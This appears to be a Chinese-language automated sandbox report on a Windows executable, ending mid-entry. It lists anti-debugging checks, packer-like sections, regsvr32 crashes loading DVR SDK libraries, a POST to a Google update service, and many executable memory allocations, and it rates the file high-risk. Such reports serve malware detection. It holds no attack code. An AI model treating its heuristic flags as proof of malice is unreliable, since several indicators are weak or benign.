6.8
高危
1 个模型检测该样本为恶意!
重新分析
更多

749734fc1c4dedf0ebd086848ca91aafbdc90366e87d1ad9babb9820ab59bfc0

d9b4cd775a5c49cc3b6a04f71fcb5938.exe

分析耗时

114s

最近分析

文件大小

1.6MB
静态报毒 动态报毒 ELDORADO
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee 20190527 6.0.6.653
Alibaba 20190513 0.3.0.4
Baidu 20190318 1.0.0.2
Avast 20190527 18.4.3895.0
Tencent 20190527 1.0.0.1
Kingsoft 20190527 2013.8.14.323
CrowdStrike 20190212 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1621007387.028876
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Checks if process is being debugged by a debugger (1 个事件)
Time & API Arguments Status Return Repeated
1621007382.013999
IsDebuggerPresent
failed 0 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
One or more processes crashed (10 个事件)
Time & API Arguments Status Return Repeated
1621007392.977938
__exception__
stacktrace: 
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0xea20ff
regsvr32+0x2669 @ 0xea2669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 2943192
registers.edi: 2943404
registers.eax: 0
registers.ebp: 2943228
registers.edx: 32
registers.ebx: 1
registers.esi: 2943216
registers.ecx: 2943368
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 00 00 00
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: DllCanUnloadNow+0x5c814 dhdeviceconfig+0xd1088
exception.address: 0x100d1088
success 0 0
1621007414.271069
__exception__
stacktrace: 
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x5320ff
regsvr32+0x2669 @ 0x532669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 714268
registers.edi: 714480
registers.eax: 0
registers.ebp: 714304
registers.edx: 32
registers.ebx: 1
registers.esi: 714292
registers.ecx: 714444
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 08 e1 48
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: DllCanUnloadNow+0x3d933 dvrintervideo+0x74787
exception.address: 0x10074787
success 0 0
1621007421.690079
__exception__
stacktrace: 
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x9c20ff
regsvr32+0x2669 @ 0x9c2669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 2746552
registers.edi: 2746764
registers.eax: 0
registers.ebp: 2746588
registers.edx: 32
registers.ebx: 1
registers.esi: 2746576
registers.ecx: 2746728
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 08 e1 48
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: DllCanUnloadNow+0x30011 videowindow+0x4bb03
exception.address: 0x1004bb03
success 0 0
1621007430.60259
__exception__
stacktrace: 
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
_vsnwprintf+0x63c RtlInitializeHandleTable-0x10 ntdll+0x4f5cf @ 0x77d7f5cf
LdrGetProcedureAddress+0x18 LdrGetProcedureAddressEx-0x9 ntdll+0x301c2 @ 0x77d601c2
New_ntdll_LdrGetProcedureAddress@16+0x59 New_ntdll_LdrLoadDll@16-0xfb @ 0x7519d359
GetProcAddress+0x44 GetVersion-0x38 kernelbase+0x111c4 @ 0x778f11c4
SE_ProcessDying+0xce ApphelpCheckExe-0x5d02 apphelp+0x1008b @ 0x750c008b
SE_ProcessDying+0x64 ApphelpCheckExe-0x5d6c apphelp+0x10021 @ 0x750c0021
hook+0x173 hook_get_mem-0x33a @ 0x75184e8e
monitor_hook+0x5d monitor_unhook-0x1c @ 0x7518162d
hook_library+0x1a unhook_library-0x3 @ 0x7518c6b9
log_init+0x1ce hook_init-0x5 @ 0x75183c00
RtlUnlockModuleSection+0x591 RtlQueryAtomInAtomTable-0x164 ntdll+0x676b8 @ 0x77d976b8
LdrLoadDll+0x310 _strcmpi-0x6f ntdll+0x3c74a @ 0x77d6c74a
RtlEncodeSystemPointer+0x222 RtlFindClearBits-0x56f ntdll+0x3e27a @ 0x77d6e27a
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x77d6e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x77d6ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x77d6e94d
RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x77d70f8f
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x77d6e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x77d6ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x77d6e94d
LdrResSearchResource+0x943 LdrResFindResourceDirectory-0x376 ntdll+0x3d69f @ 0x77d6d69f
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 973268
registers.edi: 973480
registers.eax: 0
registers.ebp: 973304
registers.edx: 32
registers.ebx: 1
registers.esi: 973292
registers.ecx: 973444
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 4c 06 89
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: HI_GetVersion+0x352 dlldeinterlace+0x1bc2
exception.address: 0x7c1bc2
success 0 0
1621007430.60259
__exception__
stacktrace: 
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
_vsnwprintf+0x63c RtlInitializeHandleTable-0x10 ntdll+0x4f5cf @ 0x77d7f5cf
LdrGetProcedureAddress+0x18 LdrGetProcedureAddressEx-0x9 ntdll+0x301c2 @ 0x77d601c2
New_ntdll_LdrGetProcedureAddress@16+0x59 New_ntdll_LdrLoadDll@16-0xfb @ 0x7519d359
GetProcAddress+0x44 GetVersion-0x38 kernelbase+0x111c4 @ 0x778f11c4
SE_ProcessDying+0xce ApphelpCheckExe-0x5d02 apphelp+0x1008b @ 0x750c008b
SE_ProcessDying+0x64 ApphelpCheckExe-0x5d6c apphelp+0x10021 @ 0x750c0021
hook+0x173 hook_get_mem-0x33a @ 0x75184e8e
monitor_hook+0x5d monitor_unhook-0x1c @ 0x7518162d
hook_library+0x1a unhook_library-0x3 @ 0x7518c6b9
log_init+0x1ce hook_init-0x5 @ 0x75183c00
RtlUnlockModuleSection+0x591 RtlQueryAtomInAtomTable-0x164 ntdll+0x676b8 @ 0x77d976b8
LdrLoadDll+0x310 _strcmpi-0x6f ntdll+0x3c74a @ 0x77d6c74a
RtlEncodeSystemPointer+0x222 RtlFindClearBits-0x56f ntdll+0x3e27a @ 0x77d6e27a
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x77d6e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x77d6ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x77d6e94d
RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x77d70f8f
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x77d6e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x77d6ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x77d6e94d
LdrResSearchResource+0x943 LdrResFindResourceDirectory-0x376 ntdll+0x3d69f @ 0x77d6d69f
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 973268
registers.edi: 973480
registers.eax: 0
registers.ebp: 973304
registers.edx: 32
registers.ebx: 1
registers.esi: 973292
registers.ecx: 973444
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 08 e1 48
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: HI_VOICE_DecodeFrame+0x51783 dhplay+0x7f6f3
exception.address: 0x7af6f3
success 0 0
1621007431.00959
__exception__
stacktrace: 
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 976700
registers.edi: 976912
registers.eax: 0
registers.ebp: 976736
registers.edx: 32
registers.ebx: 1
registers.esi: 976724
registers.ecx: 976876
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 88 78 73
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: _VMS_DownloadByRecordFile@20+0xa695 dhvms+0xd5ba
exception.address: 0x5fd5ba
success 0 0
1621007431.10259
__exception__
stacktrace: 
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 976700
registers.edi: 976912
registers.eax: 0
registers.ebp: 976736
registers.edx: 32
registers.ebx: 1
registers.esi: 976724
registers.ecx: 976876
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 00 00 08
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: plugin_info+0x7361 dhdvr+0x2a531
exception.address: 0x224a531
success 0 0
1621007431.14959
__exception__
stacktrace: 
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 976700
registers.edi: 976912
registers.eax: 0
registers.ebp: 976736
registers.edx: 32
registers.ebx: 1
registers.esi: 976724
registers.ecx: 976876
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 00 00 08
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: AMR_Encode_Frame+0x3cf4d dhnetsdk+0x97e3d
exception.address: 0x2e57e3d
success 0 0
1621007431.35259
__exception__
stacktrace: 
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 976700
registers.edi: 976912
registers.eax: 0
registers.ebp: 976736
registers.edx: 32
registers.ebx: 1
registers.esi: 976724
registers.ecx: 976876
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 00 00 00
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: _WEB_CLIENT_PacketRpcRequest@20+0x1f6cc webjsonsdk+0x5a5cc
exception.address: 0x2c8a5cc
success 0 0
1621007431.44659
__exception__
stacktrace: 
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 976700
registers.edi: 976912
registers.eax: 0
registers.ebp: 976736
registers.edx: 32
registers.ebx: 1
registers.esi: 976724
registers.ecx: 976876
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 00 00 08
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: DllCanUnloadNow+0x30433 webrec+0x66ae9
exception.address: 0x10066ae9
success 0 0
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:3222843704&cup2hreq=173397a1193dbedb66eed3d48bb74045fa488a358c275ad3167d9bfe2b28fe0f
Performs some HTTP requests (1 个事件)
request POST https://update.googleapis.com/service/update2?cup2key=10:3222843704&cup2hreq=173397a1193dbedb66eed3d48bb74045fa488a358c275ad3167d9bfe2b28fe0f
Sends data using the HTTP POST Method (1 个事件)
request POST https://update.googleapis.com/service/update2?cup2key=10:3222843704&cup2hreq=173397a1193dbedb66eed3d48bb74045fa488a358c275ad3167d9bfe2b28fe0f
Allocates read-write-execute memory (usually to unpack itself) (36 个事件)
Time & API Arguments Status Return Repeated
1621007381.731999
NtProtectVirtualMemory
process_identifier: 2216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00400000
success 0 0
1621007381.731999
NtProtectVirtualMemory
process_identifier: 2216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00401000
success 0 0
1621007381.731999
NtProtectVirtualMemory
process_identifier: 2216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 20480
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x0040f000
success 0 0
1621007382.903876
NtAllocateVirtualMemory
process_identifier: 196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1621007392.977938
NtProtectVirtualMemory
process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77531000
success 0 0
1621007392.977938
NtProtectVirtualMemory
process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75a01000
success 0 0
1621007392.977938
NtAllocateVirtualMemory
process_identifier: 2632
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x004d0000
success 0 0
1621007392.992938
NtAllocateVirtualMemory
process_identifier: 2632
region_size: 819200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02b00000
success 0 0
1621007414.271069
NtProtectVirtualMemory
process_identifier: 2656
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77531000
success 0 0
1621007414.271069
NtProtectVirtualMemory
process_identifier: 2656
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75a01000
success 0 0
1621007414.271069
NtAllocateVirtualMemory
process_identifier: 2656
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00500000
success 0 0
1621007414.271069
NtAllocateVirtualMemory
process_identifier: 2656
region_size: 442368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00540000
success 0 0
1621007421.612079
NtProtectVirtualMemory
process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x1004b000
success 0 0
1621007421.612079
NtProtectVirtualMemory
process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x743c1000
success 0 0
1621007421.612079
NtProtectVirtualMemory
process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74561000
success 0 0
1621007421.690079
NtAllocateVirtualMemory
process_identifier: 2840
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02610000
success 0 0
1621007421.690079
NtAllocateVirtualMemory
process_identifier: 2840
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02620000
success 0 0
1621007430.60259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x007e0000
success 0 0
1621007430.60259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x007f0000
success 0 0
1621007430.60259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x007f0000
success 0 0
1621007430.60259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 425984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c30000
success 0 0
1621007430.99359
NtProtectVirtualMemory
process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77531000
success 0 0
1621007430.99359
NtProtectVirtualMemory
process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75a01000
success 0 0
1621007430.99359
NtProtectVirtualMemory
process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02e57000
success 0 0
1621007430.99359
NtProtectVirtualMemory
process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x0224a000
success 0 0
1621007430.99359
NtProtectVirtualMemory
process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02c8a000
success 0 0
1621007431.00959
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02250000
success 0 0
1621007431.00959
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 143360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x022b0000
success 0 0
1621007431.10259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02260000
success 0 0
1621007431.11859
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 159744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x022b0000
success 0 0
1621007431.14959
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x022b0000
success 0 0
1621007431.14959
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 598016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x030f0000
success 0 0
1621007431.35259
NtAllocateVirtualMemory
process_identifier: 2144
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x022c0000
success 0 0
1621007431.36859
